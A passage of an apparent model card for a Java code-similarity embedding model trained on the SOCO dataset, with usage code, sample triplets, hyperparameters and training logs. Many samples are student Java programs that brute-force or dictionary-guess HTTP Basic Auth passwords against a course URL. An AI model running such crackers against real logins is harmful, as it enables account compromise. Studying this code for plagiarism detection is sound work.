System.currentTimeMillis();\n System.out.println("Total Time Taken = " + (timeEnd - timeStart) + " (msec)");\n System.out.println("Total Attempts = " + BF.getAttempts());\n }\n else {\n System.out.println("[Usage] java BruteForce <URL> <USERNAME>");\n\n }\n\n }\n}\n\nclass PassGenBrute {\n private char[] password;\n public PassGenBrute(int lenght) {\n password = new char[lenght];\n for (int i = 0; i < lenght; i++){\n password[i] = 65;\n }\n password[0]--;\n }\n \n public String getNewPassword()\n throws PasswordFailureException{\n password[0]++;\n\n try {\n for (int i=0; i<password.length ; i++){\n if (password[i] == 90) {\n password[i] = 97;\n }\n if (password[i] > 122) {\n password[i] = 65;\n password[i+1]++;\n }\n }\n }\n catch (RuntimeException re){\n throw new PasswordFailureException ();\n }\n return new String(password);\n }\n}\n\nclass PasswordFailureException extends RuntimeException {\n\n public PasswordFailureException() {\n }\n}',
'import java.net.*;\nimport java.io.*;\n\n\npublic class Dictionary {\n private String strUserName;\n private String strURL;\n private String strDictPath;\n private int iAttempts;\n\n \n public Dictionary(String strURL,String strUserName,String strDictPath) {\n this.strURL = strURL;\n this.strUserName = strUserName;\n this.iAttempts = 0 ;\n this.strDictPath = strDictPath;\n }\n \n\n public String getPassword(){\n URL u;\n String result ="";\n PassGenDict PG = new PassGenDict(3,strDictPath);\n URLConnection uc;\n String strPassword = new String();\n String strEncode;\n try{\n while (result.compareTo("HTTP/1.1 200 OK")!=0){\n \n strEncode = PG.getNewPassword();\n u = new URL(strURL);\n uc = u.openConnection();\n uc.setDoInput(true);\n uc.setDoOutput(true);\n strPassword = strEncode;\n strEncode = strUserName + ":" + strEncode;\n \n strEncode = new String(Base64.encode(strEncode.getBytes()));\n uc.setRequestProperty("Authorization"," " + strEncode);\n \n result = uc.getHeaderField(0);\n uc = null;\n u = null;\n iAttempts++;\n }\n\n }\n catch (Exception me) {\n System.out.println("MalformedURLException: "+me);\n }\n return(strPassword);\n }\n \n public int getAttempts(){\n return (iAttempts);\n };\n \n public static void main(String arg[]){\n timeStart = 0;\n timeEnd = 0;\n \n if (arg.length == 3) {\n Dictionary BF = new Dictionary(arg[0],arg[1],arg[2]);\n\n System.out.println("Processing ... ");\n timeStart = System.currentTimeMillis();\n System.out.println("Password = " + BF.getPassword());\n timeEnd = System.currentTimeMillis();\n System.out.println("Total Time Taken = " + (timeEnd - timeStart) + " (msec)");\n System.out.println("Total Attempts = " + BF.getAttempts());\n }\n else {\n System.out.println("[Usage] java BruteForce <URL> <USERNAME> <Dictionary path>");\n\n }\n\n }\n}\n\n\nclass PassGenDict {\n\n private char[] password;\n private String line;\n int iPassLenght;\n private BufferedReader inputFile;\n public PassGenDict(int lenght, String strDictPath) {\n try{\n inputFile = new BufferedReader(new FileReader(strDictPath));\n }\n catch (Exception e){\n }\n iPassLenght = lenght;\n }\n \n public String getNewPassword()\n throws PasswordFailureException{\n try {\n {\n line = inputFile.readLine();\n }while (line.length() != iPassLenght);\n\n }\n catch (Exception e){\n throw new PasswordFailureException ();\n }\n return (line);\n }\n}\n\nclass PasswordFailureException extends RuntimeException {\n\n public PasswordFailureException() {\n }\n}',
'import java.util.*;\nimport java.io.*;\nimport javax.swing.text.html.*;\n\n\npublic class WatchDog {\n\n public WatchDog() {\n\n }\n public static void main (String args[]) {\n DataInputStream newin;\n\n try{\n System.out.println("ishti");\n\n System.out.println("Downloading first copy");\n Runtime.getRuntime().exec("wget http://www.cs.rmit.edu./students/ -O oldfile.html");\n String[] cmdDiff = {"//sh", "-c", "diff oldfile.html newfile.html > Diff.txt"};\n String[] cmdMail = {"//sh", "-c", "mailx -s \\"Diffrence\\" \\"@cs.rmit.edu.\\" < Diff.txt"};\n while(true){\n Thread.sleep(24*60*60*1000);\n System.out.println("Downloading new copy");\n Runtime.getRuntime().exec("wget http://www.cs.rmit.edu./students/ -O newfile.html");\n Thread.sleep(2000);\n Runtime.getRuntime().exec(cmdDiff);\n Thread.sleep(2000);\n newin = new DataInputStream( new FileInputStream( "Diff.txt"));\n if (newin.readLine() != null){\n System.out.println("Sending Mail");\n Runtime.getRuntime().exec(cmdMail);\n Runtime.getRuntime().exec("cp newfile.html oldfile.html");\n\n }\n }\n\n }\n catch(Exception e){\n e.printStackTrace();\n }\n\n }\n\n}',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities)
# tensor([[ 1.0000, 0.9429, -0.0889],
# [ 0.9429, 1.0000, -0.0690],
# [-0.0889, -0.0690, 1.0000]])
```
<!--
### Direct Usage (Transformers)
<details><summary>Click to see the direct usage in Transformers</summary>
</details>
-->
<!--
### Downstream Usage (Sentence Transformers)
You can finetune this model on your own dataset.
<details><summary>Click to expand</summary>
</details>
-->
<!--
### Out-of-Scope Use
*List how the model may foreseeably be misused and address what users ought not to do with the model.*
-->
<!--
## Bias, Risks and Limitations
*What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.*
-->
<!--
### Recommendations
*What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.*
-->
## Training Details
### Training Dataset
#### soco_train_java
* Dataset: [soco_train_java](https://huggingface.co/datasets/buelfhood/SOCO_TRAIN_java) at [44ca4ff](https://huggingface.co/datasets/buelfhood/SOCO_TRAIN_java/tree/44ca4ff546c090153d7903c15aeda036891ec476)
* Size: 38,664 training samples
* Columns: <code>anchor_code</code>, <code>positive_code</code>, and <code>negative_code</code>
* Approximate statistics based on the first 1000 samples:
| | anchor_code | positive_code | negative_code |
|:--------|:-------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|
| type | string | string | string |
| details | <ul><li>min: 51 tokens</li><li>mean: 466.15 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 51 tokens</li><li>mean: 467.06 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 51 tokens</li><li>mean: 454.38 tokens</li><li>max: 512 tokens</li></ul> |
* Samples:
| anchor_code | positive_code | negative_code |
|:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| <code><br><br>import java.io.*;<br>import java.net.*;<br>import java.misc.BASE64Encoder;<br><br>public class Dictionary<br>{<br> public Dictionary()<br> {}<br><br> public boolean fetchURL(String urlString,String username,String password)<br> {<br> StringWriter sw= new StringWriter();<br> PrintWriter pw = new PrintWriter();<br> try{<br> URL url=new URL(urlString); <br> String userPwd= username+":"+password;<br><br> <br> <br> <br> <br><br> BASE64Encoder encoder = new BASE64Encoder();<br> String encodedStr = encoder.encode (userPwd.getBytes());<br> System.out.println("Original String = " + userPwd);<br> System.out.println("Encoded String = " + encodedStr);<br><br> HttpURLConnection huc=(HttpURLConnection) url.openConnection(); <br> huc.setRequestProperty( "Authorization"," "+encodedStr); <br> InputStream content = (InputStream)huc.getInputStream();<br> BufferedReader in =<br> new BufferedReader (new InputStreamReader (content));<br> String line;<br> while ((line = in.readLine())...</code> | <code><br><br>import java.io.*;<br>import java.net.*;<br>import java.misc.BASE64Encoder;<br><br>public class BruteForce<br>{<br> public BruteForce()<br> {}<br><br> public boolean fetchURL(String urlString,String username,String password)<br> {<br> StringWriter = new StringWriter();<br> PrintWriter pw = new PrintWriter();<br> try{<br> URL url=new URL(urlString); <br> String userPwd= username+":"+password;<br><br> <br> <br> <br> <br><br> BASE64Encoder encoder = new BASE64Encoder();<br> String encodedStr = encoder.encode (userPwd.getBytes());<br> System.out.println("Original String = " + userPwd);<br> System.out.println("Encoded String = " + encodedStr);<br><br> HttpURLConnection huc=(HttpURLConnection) url.openConnection(); <br> huc.setRequestProperty( "Authorization"," "+encodedStr); <br> InputStream content = (InputStream)huc.getInputStream();<br> BufferedReader in = <br> new BufferedReader (new InputStreamReader (content));<br> String line;<br> while ((line = in.readLine()) ...</code> | <code><br><br>import java.net.*;<br>import java.io.*;<br>import java.util.*;<br><br>public class Dictionary{<br><br> private static URL location;<br> private static String user;<br> private BufferedReader input;<br> private static BufferedReader dictionary;<br> private int maxLetters = 3;<br><br> <br><br> public Dictionary() {<br> <br> Authenticator.setDefault(new MyAuthenticator ());<br><br> startTime = System.currentTimeMillis();<br> boolean passwordMatched = false;<br> while (!passwordMatched) {<br> try {<br> input = new BufferedReader(new InputStreamReader(location.openStream()));<br> String line = input.readLine();<br> while (line != null) {<br> System.out.println(line);<br> line = input.readLine();<br> }<br> input.close();<br> passwordMatched = true;<br> }<br> catch (ProtocolException e)<br> {<br> <br> <br> }<br> catch (ConnectException e) {<br> System.out.println("Failed connect");<br> }<br> catch (IOException e) ...</code> |
| <code><br><br><br>import java.io.InputStream;<br>import java.util.Properties;<br><br>import javax.naming.Context;<br>import javax.naming.InitialContext;<br>import javax.rmi.PortableRemoteObject;<br>import javax.sql.DataSource;<br><br><br><br><br><br>public class WatchdogPropertyHelper {<br><br> private static Properties testProps;<br><br><br><br> public WatchdogPropertyHelper() {<br> }<br><br><br> <br><br> public static String getProperty(String pKey){<br> try{<br> initProps();<br> }<br> catch(Exception e){<br> System.err.println("Error init'ing the watchddog Props");<br> e.printStackTrace();<br> }<br> return testProps.getProperty(pKey);<br> }<br><br><br> private static void initProps() throws Exception{<br> if(testProps == null){<br> testProps = new Properties();<br><br> InputStream fis =<br> WatchdogPropertyHelper.class.getResourceAsStream("/watchdog.properties");<br> testProps.load(fis);<br> }<br> }<br>}<br></code> | <code><br><br><br><br>import java.io.InputStream;<br>import java.util.Properties;<br><br>import javax.naming.Context;<br>import javax.naming.InitialContext;<br>import javax.rmi.PortableRemoteObject;<br>import javax.sql.DataSource;<br><br><br><br><br>public class BruteForcePropertyHelper {<br><br> private static Properties bruteForceProps;<br><br><br><br> public BruteForcePropertyHelper() {<br> }<br><br><br> <br><br> public static String getProperty(String pKey){<br> try{<br> initProps();<br> }<br> catch(Exception e){<br> System.err.println("Error init'ing the burteforce Props");<br> e.printStackTrace();<br> }<br> return bruteForceProps.getProperty(pKey);<br> }<br><br><br> private static void initProps() throws Exception{<br> if(bruteForceProps == null){<br> bruteForceProps = new Properties();<br><br> InputStream fis =<br> BruteForcePropertyHelper.class.getResourceAsStream("/bruteforce.properties");<br> bruteForceProps.load(fis);<br> }<br> }<br>}<br><br></code> | <code><br><br><br><br><br><br><br><br>import java.io.*;<br>import java.net.*;<br>import javax.swing.Timer;<br>import java.awt.event.*;<br>import javax.swing.JOptionPane;<br><br>public class WatchDog <br>{<br> private static Process pro = null;<br> private static Runtime run = Runtime.getRuntime();<br> <br> public static void main(String[] args) <br> {<br> String cmd = null;<br> try<br> {<br> cmd = new String("wget -O original.txt http://www.cs.rmit.edu./students/");<br><br> pro = run.exec(cmd);<br> System.out.println(cmd);<br> }<br> catch (IOException e)<br> {<br> }<br> <br> class Watch implements ActionListener<br> {<br> BufferedReader in = null;<br> String str = null;<br> Socket socket;<br> public void actionPerformed (ActionEvent event)<br> {<br> <br> try<br> {<br> System.out.println("in Watch!");<br> String cmd = new String();<br> int ERROR = 1;<br> cmd = new String("wget -O new.txt http://www.cs.rmit.edu./students/");<br><br><br> System.out.println(cmd);<br> cmd = new String("diff original.txt new.txt");<br> pro = run.exec(cmd);<br> System.out.println(cmd);<br> in = new Buf...</code> |
| <code><br>import java.net.*; <br>import java.io.*; <br>public class BruteForce {<br>private static String password=" "; <br><br> <br> public static void main(String[] args) {<br> String Result=""; <br> if (args.length<1)<br> {<br> System.out.println("Error: Correct Format Filename, username e.g<>"); <br> System.exit(1); <br> }<br> BruteForce bruteForce1 = new BruteForce();<br> Result=bruteForce1.Password("http://sec-crack.cs.rmit.edu./SEC/2/",args[0]); <br> System.out.println("The Password of "+args[0]+"is.."+Result); <br> <br> }<br><br><br><br> private String Password(String urlString,String username) <br> { <br> int cnt=0;<br> <br> t0 = System.currentTimeMillis(); <br> for ( char ch = 'A'; ch <= 'z'; ch++ )<br> { <br> if (ch>'Z' && ch<'a')<br> { <br> ch='a'; <br> } <br> <br> for ( char ch1 = 'A'; ch1 <= 'z'; ch1++ )<br> { <br> <br> if (ch1>'Z' && ch1<'a')<br> { <br> ch1='a'; <br> }<br><br><br> for ( char ch2 = 'A'; ch2 <= 'z'; ch2++ )<br> { <br> if (ch2>'Z' && ch2<'a')<br> { <br> ...</code> | <code><br><br>import java.net.*; <br>import java.io.*; <br>import java.util.Date; <br>public class Dictionary{<br>private static String password=" "; <br><br> <br> public static void main(String[] args) {<br> String Result=""; <br> if (args.length<1)<br> {<br> System.out.println("Correct Format Filename username e.g<>"); <br> System.exit(1); <br> }<br> <br> Dictionary dicton1 = new Dictionary();<br> Result=dicton1.Dict("http://sec-crack.cs.rmit.edu./SEC/2/",args[0]); <br> System.out.println("Cracked Password for The User "+args[0]+" The Password is.."+Result); <br> <br><br> <br> <br> }<br><br><br><br> private String Dict(String urlString,String username) <br> { <br> int cnt=0;<br> FileInputStream stream=null;<br> DataInputStream word=null;<br><br> try{ <br> stream = new FileInputStream ("/usr/share/lib/dict/words"); <br><br> word =new DataInputStream(stream);<br> t0 = System.currentTimeMillis(); <br> while (word.available() !=0) <br> {<br> <br> password=word.readLine();<br> if (password.length()!=3)<br> {<br> continue;<br> }<br> System.out.print("...</code> | <code><br>package java.httputils;<br><br>import java.io.IOException;<br>import java.net.MalformedURLException;<br>import java.util.ArrayList;<br>import java.util.Iterator;<br><br><br>public class RunnableHttpRequest extends Thread<br>{<br> protected String targetURL = "http://localhost:8080/";<br> protected int requestCount = 1;<br> protected ArrayList timingList = new ArrayList();<br> protected HttpRequestClient req;<br> Boolean finished = new Boolean(false);<br> HttpRequestThreadPool pool;<br><br> <br> public void run()<br> {<br> try<br> {<br> for (int i = 0; i < getRequestCount() && !getFinished().booleanValue(); i++)<br> {<br> try<br> {<br> req =<br> new HttpRequestClient(getTargetURL());<br><br> <br> }<br> catch (MalformedURLException e)<br> {<br> e.printStackTrace();<br> break;<br> }<br> catch (IOException e)<br> {<br> ...</code> |
* Loss: [<code>MultipleNegativesRankingLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#multiplenegativesrankingloss) with these parameters:
```json
{
"scale": 20.0,
"similarity_fct": "cos_sim",
"gather_across_devices": false
}
```
### Evaluation Dataset
#### soco_train_java
* Dataset: [soco_train_java](https://huggingface.co/datasets/buelfhood/SOCO_TRAIN_java) at [44ca4ff](https://huggingface.co/datasets/buelfhood/SOCO_TRAIN_java/tree/44ca4ff546c090153d7903c15aeda036891ec476)
* Size: 4,296 evaluation samples
* Columns: <code>anchor_code</code>, <code>positive_code</code>, and <code>negative_code</code>
* Approximate statistics based on the first 1000 samples:
| | anchor_code | positive_code | negative_code |
|:--------|:-------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|
| type | string | string | string |
| details | <ul><li>min: 51 tokens</li><li>mean: 465.22 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 51 tokens</li><li>mean: 464.66 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 51 tokens</li><li>mean: 458.05 tokens</li><li>max: 512 tokens</li></ul> |
* Samples:
| anchor_code | positive_code | negative_code |
|:---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| <code><br><br><br><br><br><br>import java.util.*;<br>import java.io.*;<br><br>public class WatchDog<br>{ <br><br> public static void main(String args[])<br> {<br><br> Runtime rt1 = Runtime.getRuntime();<br> Process prss1= null;<br><br> try<br> {<br> prss1 = rt1.exec("wget -R mpg,mpeg, --output-document=first.html http://www.cs.rmit.edu./students/");<br> }catch(java.io.IOException e){}<br><br> MyWatchDogTimer w = new MyWatchDogTimer();<br> Timer time = new Timer();<br> time.schedule(w,864000000,864000000);<br><br> <br> }<br>}<br></code> | <code> <br><br><br><br><br>import java.util.*;<br>import java.io.*;<br><br>public class MyTimer<br>{ <br><br> public static void main(String args[])<br> {<br> Watchdog watch = new Watchdog();<br> Timer time = new Timer();<br> time.schedule(watch,864000000,864000000);<br> <br> <br> }<br>}<br></code> | <code>import java.net.*; <br>import java.io.*; <br>import java.util.Vector;<br>import java.util.Date;<br>import java.security.*;<br><br><br><br><br><br><br><br><br><br><br><br> <br>public class Dictionary { <br> public static BufferedReader in;<br> <br> <br> public static void main(String[] args) throws Exception { <br> String baseURL = "http://sec-crack.cs.rmit.edu./SEC/2/index.php"; <br> int count=0;<br> Date date = new Date();<br> startTime=date.getTime();<br> int LIMITINMINUTES=45;<br> int TIMELIMIT=LIMITINMINUTES*1000*60;<br> boolean timedOut=false;<br> boolean found=false;<br> <br> <br> Vector dictionary=new Vector(readWords());<br> System.out.println("Words in dictionary: "+dictionary.size());<br> <br> <br> <br> <br> <br> <br> <br> while (found==false && timedOut==false && dictionary.elementAt(count)!=null) {<br> <br> Date endDate = new Date();<br> endTime=endDate.getTime(); <br> if (endTime>(TIMELIMIT+startTime)){<br> System.out.println("Timed out");<br> timedOut=true;<br> }<br> <br> String password = "";<br><br> ...</code> |
| <code><br><br><br>import java.io.InputStream;<br>import java.util.Properties;<br><br>import javax.naming.Context;<br>import javax.naming.InitialContext;<br>import javax.rmi.PortableRemoteObject;<br>import javax.sql.DataSource;<br><br><br><br><br><br><br>public class MailsendPropertyHelper {<br><br> private static Properties testProps;<br><br> public MailsendPropertyHelper() {<br> }<br><br><br> <br><br> public static String getProperty(String pKey){<br> try{<br> initProps();<br> }<br> catch(Exception e){<br> System.err.println("Error init'ing the watchddog Props");<br> e.printStackTrace();<br> }<br> return testProps.getProperty(pKey);<br> }<br><br><br> private static void initProps() throws Exception{<br> if(testProps == null){<br> testProps = new Properties();<br><br> InputStream fis =<br> MailsendPropertyHelper.class.getResourceAsStream("/mailsend.properties");<br> testProps.load(fis);<br> }<br> }<br>}<br><br><br><br><br><br></code> | <code><br><br><br><br>import java.io.InputStream;<br>import java.util.Properties;<br><br>import javax.naming.Context;<br>import javax.naming.InitialContext;<br>import javax.rmi.PortableRemoteObject;<br>import javax.sql.DataSource;<br><br><br><br><br>public class BruteForcePropertyHelper {<br><br> private static Properties bruteForceProps;<br><br><br><br> public BruteForcePropertyHelper() {<br> }<br><br><br> <br><br> public static String getProperty(String pKey){<br> try{<br> initProps();<br> }<br> catch(Exception e){<br> System.err.println("Error init'ing the burteforce Props");<br> e.printStackTrace();<br> }<br> return bruteForceProps.getProperty(pKey);<br> }<br><br><br> private static void initProps() throws Exception{<br> if(bruteForceProps == null){<br> bruteForceProps = new Properties();<br><br> InputStream fis =<br> BruteForcePropertyHelper.class.getResourceAsStream("/bruteforce.properties");<br> bruteForceProps.load(fis);<br> }<br> }<br>}<br><br></code> | <code><br>import java.net.*;<br>import java.io.*;<br>import java.Ostermiller.util.*;<br>import java.util.*;<br><br>public class MyClient2 implements Runnable<br>{<br> private String hostname;<br> private int port;<br> private String filename;<br> private Socket s;<br> private int n;<br> private InputStream sin;<br> private OutputStream sout;<br> private int dif;<br> private String myPassword;<br> private int status;<br> private int myTime;<br> private BruteForce myMaster;<br> <br><br> public MyClient2(BruteForce bf , int num, int myPort, String password)<br> {<br> <br> hostname = new String("sec-crack.cs.rmit.edu.");<br> port = myPort;<br> status = 0;<br> myTime = 0;<br> myPassword = password;<br> filename = new String("/SEC/2/");<br> myMaster = 0;<br> n = num;<br> dif = 0;<br> <br> }<br> public getDif()<br> {<br> return dif;<br> }<br> public int getStatus()<br> {<br> return status;<br> }<br> public void run() <br> {<br> String inputLine;<br> String[] tokens = new String[5];<br> int i;<br> myTime = 0;<br> ...</code> |
| <code>import java.io.*;<br>import java.net.*;<br>import java.util.*;<br><br><br>public class Dictionary<br>{<br> public static void main (String args[])<br> {<br> <br> <br> Calendar cal = Calendar.getInstance();<br> Date now=cal.getTime();<br> double startTime = now.getTime();<br><br> String password=getPassword(startTime);<br> System.out.println("The password is " + password);<br> }<br><br> public static String getPassword(double startTime)<br> {<br> String password="";<br> int requests=0;<br><br> try<br> {<br> <br> FileReader fRead = new FileReader("/usr/share/lib/dict/words");<br> BufferedReader buf = new BufferedReader(fRead);<br><br> password=buf.readLine();<br><br> while (password != null)<br> {<br> <br> if (password.length()<=3)<br> {<br> requests++;<br> if (testPassword(password, startTime, requests))<br> return password;<br> }<br><br> password = buf.readLine();<br><br> }<br> }<br> catch (IOException ioe)<br> {<br><br> }<br><br> return password;<br> }<br><br> private static boolean testPassword(String password, double startTime, int requests)<br> {<br> try<br> {<br> <br> <br> U...</code> | <code>import java.io.*;<br>import java.net.*;<br>import java.util.*;<br><br><br>public class BruteForce<br>{<br><br> public static void main(String args[])<br> {<br> <br> <br> Calendar cal = Calendar.getInstance();<br> Date now=cal.getTime();<br> double startTime = now.getTime();<br><br> String password=getPassword(startTime);<br> System.out.println("The password is " + password);<br> }<br><br> public static String getPassword(double startTime)<br> {<br> char first, second, third;<br> String password="";<br> int requests=0;<br><br> <br> for (int i=65; i<123; i++)<br> {<br> requests++;<br> first = (char) i;<br><br> password = first + "";<br><br> <br> if (testPassword(password, startTime, requests))<br> return password;<br><br> for (int j=65; j<123; j++)<br> {<br> requests++;<br> second = (char) j;<br><br> password = first + "" + second;<br><br> <br> if (testPassword(password, startTime, requests))<br> return password;<br><br> for (int k=65; k<123; k++)<br> {<br> requests++;<br> third = (char) k;<br><br> password = first + "" + second + "" + third;<br><br> <br> if (test...</code> | <code><br><br>import java.misc.BASE64Encoder;<br>import java.misc.BASE64Decoder;<br>import java.io.*;<br>import java.net.*;<br>import java.util.*;<br><br><br><br>public class Dictionary {<br> <br> public Dictionary(String url, String dictionaryFile) {<br> try{<br> this.url = url;<br> this.dictionaryPath = dictionaryFile;<br> InputStream fis = new FileInputStream(this.dictionaryPath);<br> dict = new BufferedReader(new InputStreamReader(fis));<br><br> }catch(IOException ioe){<br> System.out.println("Error opening dictionary file:\n" +ioe);<br> }<br> }<br><br><br> <br> private String url = null;<br> <br> private String dictionaryPath = null;<br> <br> private BufferedReader dict = null;<br> <br> private int attempts = 0;<br> <br> private int passwordSize = 3;<br> <br> public void setPasswordSize(int size){<br> this.passwordSize = size;<br> }<br> <br> public String getNextPassword()throws IOException{<br><br> String line = dict.readLine();<br><br> while(line!=null&&line.length()!=this.passwordSize )<br> line = dict.readLine();<br><br> return line;<br> }<br> <br> publ...</code> |
* Loss: [<code>MultipleNegativesRankingLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#multiplenegativesrankingloss) with these parameters:
```json
{
"scale": 20.0,
"similarity_fct": "cos_sim",
"gather_across_devices": false
}
```
### Training Hyperparameters
#### Non-Default Hyperparameters
- `per_device_train_batch_size`: 16
- `learning_rate`: 2e-05
- `num_train_epochs`: 1
- `warmup_ratio`: 0.1
- `fp16`: True
- `batch_sampler`: no_duplicates
#### All Hyperparameters
<details><summary>Click to expand</summary>
- `overwrite_output_dir`: False
- `do_predict`: False
- `eval_strategy`: no
- `prediction_loss_only`: True
- `per_device_train_batch_size`: 16
- `per_device_eval_batch_size`: 8
- `per_gpu_train_batch_size`: None
- `per_gpu_eval_batch_size`: None
- `gradient_accumulation_steps`: 1
- `eval_accumulation_steps`: None
- `torch_empty_cache_steps`: None
- `learning_rate`: 2e-05
- `weight_decay`: 0.0
- `adam_beta1`: 0.9
- `adam_beta2`: 0.999
- `adam_epsilon`: 1e-08
- `max_grad_norm`: 1.0
- `num_train_epochs`: 1
- `max_steps`: -1
- `lr_scheduler_type`: linear
- `lr_scheduler_kwargs`: {}
- `warmup_ratio`: 0.1
- `warmup_steps`: 0
- `log_level`: passive
- `log_level_replica`: warning
- `log_on_each_node`: True
- `logging_nan_inf_filter`: True
- `save_safetensors`: True
- `save_on_each_node`: False
- `save_only_model`: False
- `restore_callback_states_from_checkpoint`: False
- `no_cuda`: False
- `use_cpu`: False
- `use_mps_device`: False
- `seed`: 42
- `data_seed`: None
- `jit_mode_eval`: False
- `use_ipex`: False
- `bf16`: False
- `fp16`: True
- `fp16_opt_level`: O1
- `half_precision_backend`: auto
- `bf16_full_eval`: False
- `fp16_full_eval`: False
- `tf32`: None
- `local_rank`: 0
- `ddp_backend`: None
- `tpu_num_cores`: None
- `tpu_metrics_debug`: False
- `debug`: []
- `dataloader_drop_last`: False
- `dataloader_num_workers`: 0
- `dataloader_prefetch_factor`: None
- `past_index`: -1
- `disable_tqdm`: False
- `remove_unused_columns`: True
- `label_names`: None
- `load_best_model_at_end`: False
- `ignore_data_skip`: False
- `fsdp`: []
- `fsdp_min_num_params`: 0
- `fsdp_config`: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
- `fsdp_transformer_layer_cls_to_wrap`: None
- `accelerator_config`: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
- `parallelism_config`: None
- `deepspeed`: None
- `label_smoothing_factor`: 0.0
- `optim`: adamw_torch_fused
- `optim_args`: None
- `adafactor`: False
- `group_by_length`: False
- `length_column_name`: length
- `ddp_find_unused_parameters`: None
- `ddp_bucket_cap_mb`: None
- `ddp_broadcast_buffers`: False
- `dataloader_pin_memory`: True
- `dataloader_persistent_workers`: False
- `skip_memory_metrics`: True
- `use_legacy_prediction_loop`: False
- `push_to_hub`: False
- `resume_from_checkpoint`: None
- `hub_model_id`: None
- `hub_strategy`: every_save
- `hub_private_repo`: None
- `hub_always_push`: False
- `hub_revision`: None
- `gradient_checkpointing`: False
- `gradient_checkpointing_kwargs`: None
- `include_inputs_for_metrics`: False
- `include_for_metrics`: []
- `eval_do_concat_batches`: True
- `fp16_backend`: auto
- `push_to_hub_model_id`: None
- `push_to_hub_organization`: None
- `mp_parameters`:
- `auto_find_batch_size`: False
- `full_determinism`: False
- `torchdynamo`: None
- `ray_scope`: last
- `ddp_timeout`: 1800
- `torch_compile`: False
- `torch_compile_backend`: None
- `torch_compile_mode`: None
- `include_tokens_per_second`: False
- `include_num_input_tokens_seen`: False
- `neftune_noise_alpha`: None
- `optim_target_modules`: None
- `batch_eval_metrics`: False
- `eval_on_start`: False
- `use_liger_kernel`: False
- `liger_kernel_config`: None
- `eval_use_gather_object`: False
- `average_tokens_across_devices`: False
- `prompts`: None
- `batch_sampler`: no_duplicates
- `multi_dataset_batch_sampler`: proportional
- `router_mapping`: {}
- `learning_rate_mapping`: {}
</details>
### Training Logs
| Epoch | Step | Training Loss |
|:------:|:----:|:-------------:|
| 0.0414 | 100 | 1.297 |
| 0.0827 | 200 | 0.3721 |
| 0.1241 | 300 | 0.3752 |
| 0.1655 | 400 | 0.3124 |
| 0.2069 | 500 | 0.3386 |
| 0.2482 | 600 | 0.3278 |
| 0.2896 | 700 | 0.3256 |
| 0.3310 | 800 | 0.318 |
| 0.3724 | 900 | 0.3164 |
| 0.4137 | 1000 | 0.3372 |
| 0.4551 | 1100 | 0.3126 |
| 0.4965 | 1200 | 0.3015 |
| 0.5379 | 1300 | 0.3224 |
| 0.5792 | 1400 | 0.3263 |
| 0.6206 | 1500 | 0.3165 |
| 0.6620 | 1600 | 0.3376 |
| 0.7034 | 1700 | 0.2949 |
| 0.7447 | 1800 | 0.304 |
| 0.7861 | 1900 | 0.3123 |
| 0.8275 | 2000 | 0.2829 |
| 0.8688 | 2100 | 0.2901 |
| 0.9102 | 2200 | 0.2973 |
| 0.9516 | 2300 | 0.3004 |
| 0.9930 | 2400 | 0.3657 |
### Framework Versions
- Python: 3.11.11
- Sentence Transformers: 5.1.1
- Transformers: 4.56.2
- PyTorch: 2.8.0.dev20250319+cu128
- Accelerate: 1.10.1
- Datasets: 4.1.1
